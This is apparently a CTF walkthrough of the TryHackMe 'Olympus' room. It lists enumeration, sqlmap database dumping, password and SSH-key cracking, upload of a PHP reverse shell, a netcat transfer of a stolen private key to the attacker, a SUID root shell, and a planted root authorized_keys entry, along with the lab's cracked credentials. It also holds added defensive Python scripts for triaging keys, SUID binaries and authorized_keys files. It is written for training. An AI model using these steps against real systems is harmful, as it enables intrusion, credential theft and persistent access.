Room Link: https://tryhackme.com/room/olympusroom
Initial Scan
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
dirb http://olympus.thm
SQLMap
Kali
req.txt is the captured HTTP request (saved from the browser/Burp) containing the injectable parameter; sqlmap takes the target, method, headers and body from it
sqlmap -r req.txt --banner
Kali
sqlmap -r req.txt --tables
Kali
sqlmap -r req.txt --dbms=mysql --dump
Kali
Save the password hashes from the dumped user table to hashes.txt and crack them
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Rerun because VM crashed
Browser
Username: prometheus
Password: summertime
Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Set $ip and $port in the script to the Kali listener address and port before uploading it
Kali
chat.olympus.thm (like olympus.thm) needs an /etc/hosts entry pointing at $VICTIM; -U/-P give gobuster the cracked prometheus login as HTTP basic-auth credentials for the brute force
gobuster -U prometheus -P summertime dir -u chat.olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
The chat application's table (chats) was already visible in the earlier sqlmap --tables output.
I deleted sqlmap's saved output for the host to force a fresh run, as it kept returning the cached results.
Kali
rm -rf /root/.sqlmap/output/olympus.thm/
sqlmap -r req.txt --dbms=mysql --dump -T chats -D olympus
(sqlmap's --flush-session option discards the stored session for the target and has the same effect as deleting the output directory)
Upgrade the reverse shell to a full TTY (tab completion, job control, clean Ctrl-C)
Victim (inside the reverse shell)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Kali (local terminal: background the shell, fix the terminal, bring it back)
ctrl + Z
stty raw -echo; fg
Victim
cd /home/zeus
cat zeus.txt
Victim
Enumerate SUID binaries; /usr/bin/cputils is not a stock one
find / -perm -u=s -type f 2> /dev/null
Victim
cputils runs with the SUID bit set; it is used here to get a copy of zeus's SSH private key (id_rsa) into /tmp
ls -lah /usr/bin/cputils
/usr/bin/cputils
Netcat
Kali(receiving)
nc -l -p 1234 > id_rsa
Victim(sending)
cd /tmp
nc -w 3 $KALI 1234 < id_rsa
Compare sha256sum id_rsa on both sides to confirm the copy is complete before cracking it
Kali
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt
Kali
ssh -i id_rsa zeus@$VICTIM
Passphrase for the key (cracked by john): snowflake
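Before handing a key to ssh2john it is worth checking whether it is encrypted at all and with which KDF: legacy PEM keys (BEGIN RSA PRIVATE KEY with a DEK-Info header) derive the cipher key with a single MD5 pass and crack quickly, while OpenSSH-container keys protected with bcrypt at the default 16 rounds cost orders of magnitude more per guess. The inspector below is an added example, not part of the original writeup or of john/ssh2john; inspect_private_key, build_openssh_container and LEGACY_SAMPLE are names chosen here, and the keys it builds are constructed stubs with placeholder key material, not real keys.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"  # fixed header of the OpenSSH v1 private-key container


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length, then bytes) at offset off."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _armor_body(text):
    """Base64-decode the lines between the BEGIN and END markers, skipping header lines."""
    lines = [l.strip() for l in text.strip().splitlines()]
    return base64.b64decode("".join(l for l in lines[1:-1] if l and ":" not in l))


def inspect_private_key(text):
    """Report how an SSH private key is protected, without decrypting it.

    Handles the OpenSSH container (BEGIN OPENSSH PRIVATE KEY) and legacy PEM
    keys (BEGIN RSA/DSA/EC PRIVATE KEY with Proc-Type / DEK-Info headers).
    """
    first = text.strip().splitlines()[0]
    if "OPENSSH PRIVATE KEY" in first:
        buf = _armor_body(text)
        if not buf.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(MAGIC)
        cipher, off = _read_string(buf, off)
        kdf, off = _read_string(buf, off)
        kdfopts, off = _read_string(buf, off)
        (nkeys,) = struct.unpack(">I", buf[off:off + 4])
        info = {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "encrypted": cipher != b"none", "keys": nkeys, "rounds": None}
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (info["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
        return info
    # Legacy PEM: encryption is signalled by headers; key derivation is OpenSSL's
    # EVP_BytesToKey with one MD5 iteration, which is why these crack so fast.
    headers = dict(l.split(":", 1) for l in text.splitlines()
                   if ":" in l and not l.startswith("-----"))
    encrypted = headers.get("Proc-Type", "").strip() == "4,ENCRYPTED"
    dek = headers.get("DEK-Info", "").strip()
    return {"format": "pem", "cipher": dek.split(",")[0] if dek else "none",
            "kdf": "evp-bytestokey-md5" if encrypted else "none",
            "encrypted": encrypted, "keys": 1, "rounds": 1 if encrypted else None}


def build_openssh_container(cipher="aes256-ctr", kdf="bcrypt", rounds=16, salt=b"\x00" * 16):
    """Constructed sample: an openssh-key-v1 header around placeholder blobs (not a usable key)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = s(salt) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = (MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
            + struct.pack(">I", 1) + s(b"placeholder-public") + s(b"placeholder-private"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body


# Constructed legacy-format sample: only the header lines matter here, the body is filler.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0102030405060708090A0B0C0D0E0F10

AAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    import sys
    print(inspect_private_key(open(sys.argv[1]).read() if len(sys.argv) > 1 else LEGACY_SAMPLE))
```

Run it with the recovered id_rsa as the argument: an "encrypted": False result means there is nothing to crack and ssh will accept the key as-is, and a large bcrypt rounds value tells you up front that rockyou will take a long time.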
Privilege Escalation
Victim
A hidden web directory holds a PHP backdoor; read it to see what it executes
cd /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/
cat VIGQFQFMYOST.php
Victim
The command string below (taken from the backdoor, where $suid_bd appears to hold the path) points at a SUID binary at /lib/defended/libc.so.99; running that binary directly gives a root shell, confirm with whoami
/lib/defended/libc.so.99;uname -a; w; $suid_bd
whoami
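The find at the SUID enumeration step lists every setuid file, and the two that mattered here were both out of place: /usr/bin/cputils is not a stock binary, and /lib/defended/libc.so.99 is a setuid executable hiding under a shared-library name. The triage script below is an added example, not from the room or the writeup: it walks a tree, keeps only setuid/setgid regular files and reports the ones that trip simple rules (outside the directories where Debian/Ubuntu ship setuid programs, an assumed list in EXPECTED_PREFIXES; library-style names; world-writable). demo() builds a constructed temporary tree with a planted libc.so.99 so the script can be exercised without root.

```python
import os
import stat
import tempfile

# Assumption: a stock Debian/Ubuntu layout, where setuid-root programs live
# under these prefixes. Anything setuid elsewhere deserves a look.
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def find_setid_files(root):
    """Return (path, mode, uid) for every regular file under root with SUID or SGID set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # pseudo-filesystems never hold real setuid programs; skip them
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_mode, st.st_uid))
    return hits


def suspicion_reasons(path, mode, expected_prefixes=EXPECTED_PREFIXES):
    """Why a setuid/setgid file looks planted rather than shipped; empty list means 'looks normal'."""
    reasons = []
    if not path.startswith(expected_prefixes):
        reasons.append("outside the usual setuid directories")
    if ".so" in os.path.basename(path):
        reasons.append("shared-library style name on an executable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def triage(root="/"):
    """Walk root and return only the setuid/setgid files that trip a rule, with the reasons."""
    out = []
    for path, mode, uid in find_setid_files(root):
        why = suspicion_reasons(path, mode)
        if why:
            out.append({"path": path, "uid": uid, "mode": oct(mode & 0o7777), "reasons": why})
    return out


def demo():
    """Constructed sample tree: a planted setuid file with a library-like name plus a harmless file."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    libdir = os.path.join(base, "lib", "defended")
    os.makedirs(libdir)
    planted = os.path.join(libdir, "libc.so.99")
    benign = os.path.join(base, "notes.txt")
    for p in (planted, benign):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(planted, 0o4755)  # the demo itself sets the setuid bit on its own file
    os.chmod(benign, 0o644)
    try:
        return triage(base)
    finally:
        for p in (planted, benign):
            os.remove(p)
        os.removedirs(libdir)  # removes lib/defended, lib and the now-empty base


if __name__ == "__main__":
    for hit in triage("/"):
        print(hit)
```

Run as-is on the target it prints only the anomalies instead of the full find output; the rules are deliberately coarse, so treat the list as a starting point and still read the full SUID list on an unfamiliar box.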
Secret Flag
Kali
Generate a key pair for root access, saving it as /root/epic when prompted
ssh-keygen -t rsa
cat /root/epic.pub
Victim
As root on the victim, paste the contents of epic.pub into root's authorized_keys (create /root/.ssh with mode 700 if it does not exist)
vi /root/.ssh/authorized_keys
Kali
ssh -i epic root@$VICTIM
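Dropping a public key into /root/.ssh/authorized_keys is the persistence step a defender will look for. The audit below is an added example, not part of the original writeup: it parses each line the way sshd does (options, key type, blob, comment), checks that the type string embedded in the base64 blob matches the declared type, and flags keys that carry no from= or command= restriction or a comment that is not on an expected list. fake_blob builds constructed blobs with placeholder key bytes so the script runs offline; audit, parse_line and SAMPLE are names chosen here.

```python
import base64
import struct

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _split_options(line):
    """Separate the leading option list from the rest of an authorized_keys line.

    Options are comma separated, and a quoted value (from="a,b", command="x y")
    may itself contain commas and spaces, so a plain split() is not enough.
    """
    if line.split(None, 1)[0] in KEY_TYPES:
        return [], line
    opts, cur, quoted = [], "", False
    for i, c in enumerate(line):
        if c == '"' and (i == 0 or line[i - 1] != "\\"):
            quoted = not quoted
        if c == "," and not quoted:
            opts.append(cur)
            cur = ""
        elif c.isspace() and not quoted:
            opts.append(cur)
            return opts, line[i:].lstrip()
        else:
            cur += c
    return opts + [cur], ""


def parse_line(line):
    """Return options, declared type, the type string embedded in the blob, and the comment."""
    opts, rest = _split_options(line.strip())
    parts = rest.split(None, 2)
    if len(parts) < 2:
        raise ValueError("malformed authorized_keys line: %r" % line)
    raw = base64.b64decode(parts[1])
    (n,) = struct.unpack(">I", raw[:4])  # a key blob starts with an SSH string naming its type
    return {"options": opts, "type": parts[0], "embedded_type": raw[4:4 + n].decode(),
            "comment": parts[2] if len(parts) > 2 else ""}


def audit(text, expected_comments=()):
    """Flag entries a defender should question; returns (line number, comment, problems)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        entry = parse_line(line)
        problems = []
        if entry["type"] != entry["embedded_type"]:
            problems.append("key type does not match blob")
        names = [o.split("=", 1)[0] for o in entry["options"]]
        if "from" not in names and "command" not in names:
            problems.append("unrestricted (no from=/command=)")
        if expected_comments and entry["comment"] not in expected_comments:
            problems.append("unknown comment %r" % entry["comment"])
        if problems:
            findings.append((lineno, entry["comment"], problems))
    return findings


def fake_blob(ktype):
    """Constructed key blob: correct leading type string, placeholder key material after it."""
    raw = struct.pack(">I", len(ktype)) + ktype.encode() + struct.pack(">I", 3) + b"abc"
    return base64.b64encode(raw).decode()


# Constructed sample of /root/.ssh/authorized_keys after a key has been dropped in.
SAMPLE = "\n".join([
    "# root authorized_keys (constructed sample)",
    'from="10.0.0.5",command="/usr/local/bin/backup" ssh-ed25519 %s backup@ops' % fake_blob("ssh-ed25519"),
    "ssh-rsa %s kali@kali" % fake_blob("ssh-rsa"),
    "ssh-rsa %s admin@ops" % fake_blob("ssh-ed25519"),
])

if __name__ == "__main__":
    for lineno, comment, problems in audit(SAMPLE, expected_comments=("backup@ops", "admin@ops")):
        print("line %d (%s): %s" % (lineno, comment, "; ".join(problems)))
```

Feed it the real file and the list of comments your provisioning actually writes; the key added in this room shows up as an unrestricted entry with a comment nobody recognises.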